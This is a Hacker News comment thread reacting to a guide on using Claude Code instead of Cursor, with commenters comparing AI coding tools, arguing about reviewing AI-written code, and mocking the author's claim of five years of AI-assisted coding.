Was also tempted by the price but GLM-4.6 was so terrible that I instantly subscribed to Claude again, it's just not worth it. Don't know if 4.7 is much improved but for me nothing can compete with Claude sadly.
Nothing competes with Opus 4.5 in Claude Code. Codex & Gemini are arguable.
Yeah, but I thought at 29 USD for a year with 3 times the limit it might be able to compete.
But I will probably check out Claude Code next month when my Github Copilot subscription runs out.
Edit: I found this: https://www.reddit.com/r/ClaudeCode/comments/1q6f62t/tried_n... Seems like it might be worth to check it out. Found a 10% discount that works on the additional discount so now it would be 26 USD / year.
Also found this discussion, where it's much more of a mixed bag: https://np.reddit.com/r/LocalLLaMA/comments/1pveluj/honestly...
Codex 5.2 XHigh + 5.2 Pro as oracle is the leader for getting to working solutions
This is a good guide on how to use Claude Code. My perspective (from an early adopter of LLMs for coding) is similar. Though OpenCode has a lot of potential as well, so I'm happy that Claude Code is not the only option. But a key aspect, imo, is that using these tools is also a skill, and there's a lot of knowledge involved in making something good with the assistance of Claude Code vs. producing slop - especially as soon as you deviate from a very basic application or work in a larger repo with multiple people. There's a layer of context that these tools don't quite have, and it's very difficult to consistently provide it to them. I can see this being less the case as context windows grow and the reliability of larger-context retrieval is solved.
Appreciate it! And agree. I added a longer comment above saying basically this.
I'm copacetic to the notion we're not at enterprise codebase level (yet), but everyone who still thinks agentic coding stops at React CRUD apps needs to update their priors.
I needed a PoC RAG pipeline to demo concepts to other teams. Built and tested this over the weekend, exclusively with Claude Code and a little OpenCode. A mix of the mobile app and breaking out an Android terminal to allow Sonnet 4.5 to run the dotnet build chain on tricky compilation issues.
https://github.com/pixelbadger/Pixelbadger.Toolkit.Rag
Not sure why you're getting downvoted, but that's exactly what AI is turning out to be great for: being able to make something in a weekend that would've taken weeks otherwise means other things downstream of it suddenly also become possible.
> a poc RAG pipeline
Why would that be any harder than a React app? At least for me, having an LLM produce a decent and consistent UI layout is not that straightforward.
This reads like a useful guide, not an answer to the question "why use Claude code over cursor" that the author includes at the beginning.
Any suggestions on what to add to answer the question better? I tried to cover this in "Why I switched", "When to use Cursor", and "My current setup" sections.
Sometimes it's what you remove not what you add. I realise this is hard for a token generator to understand.
Top 0.01% user of a code LLM demonstrates extreme unwillingness to learn anything.
I have recently started using Github Copilot for some small personal projects and am blown away by how fast it is possible to create a solution that does the job. Of course it's not optimized for security or scaling, but it doesn't have to be. The most mind-blowing moment was when Copilot searched the API documentation and implemented everything, just asking me to add my API key to the .env. Wild times.
Regarding not reviewing the output: AI works great when you’re trying to sell it.
That being said, after seeing inside a couple of YC-backed SaaS companies, I believe you can get by without reading the code. There are bugs _everywhere_, yet one of these companies made it for years and sold. I'm currently going through the onerous process of fixing this, as the new company has a lot of interest in reducing the defect count. It is painful and difficult, and it feels like the company bought a lemon.
I think the reality is there’s a lot of money to be made with buggy software. But, there’s still plenty of money in making reliable software as well (I think?).
Claude code all the way! If anybody wants to help me beta test my own web-based set up for managing multiple claude code instances on hetzner vpses: clodhost.com!
Do we really need to qualify our power user level down to 100ppm percentiles...?
Comparing digital penile volume is a time-honored tradition!
This. Also I'm quoting the email they sent me.
Just completely hilarious how 6 months ago about 50% of Hacker News comments were AI denialists telling everybody they were full of shit and that LLMs were not useful. That group is awfully quiet nowadays. The bar has clearly moved to "eventually we won't even need to do code reviews".
LLM denialists were always wrong and they should be embarrassed to share their bad model of reality and how the world works.
"LLM denialists".
You mean people who don't like statistical models trained on random code, with no oversight or vetting of the training material?
No, we're still the majority.
Please stop sending PRs to open source projects that are just thousands and thousands of lines of random slop. We're tired of seeing them.
Like I said, it's embarrassing to hold onto a model of a world that does not match reality for this long but if it helps you cope...
Wouldn't this kind of setup eat tokens at a very fast rate, such that even the Max plan would be quickly overrun? Isn't a more viable workflow to use Claude Code to create just one pull request at a time, lightly review the code, and allow it to be merged?
I'd love to have you as a top user on autohand [.] ai/cli and interested in your experience with us.
Is it just me, or has Claude Code gotten really stupid the last several days. I've been using it almost since it was publicly released, and the last several days it feels like it reverted back 6 months. I was almost ready to start yolo-ing everything, and now it's doing weird hallucinations again and forgetting how to edit files. It used to go into plan mode automatically, now it won't unless I make it.
What the fuck is this article supposed to be? An interesting read at first, but further down it becomes really disorganized, almost like AI slop.
How can I improve it in the future? The intention was to start as a story, and become more of a structured guide as you read on.
> my experience from 5 years of coding with AI
5 years? You were coding with AI in January 2021 - mid pandemic?
Can we please not fill Hacker News with this obvious rubbish?
> I was a top 0.01%
wow
> This is a guide that combines:
> 1. my experience from 5 years of coding with AI
It is a testament to the power of this technology that the author has managed to fit five years of coding with AI in between 2023 and now
> AI in between 2023 and now
And produce nothing of substance besides more incestuous content about AI and AI-development.
Brb perfecting time dilation to become better buds with this cloud based productivity tool suite
I'd love to have you as a top user on autohand [.] ai/cli and interested in your experience with us. We're a bootstrap ai lab.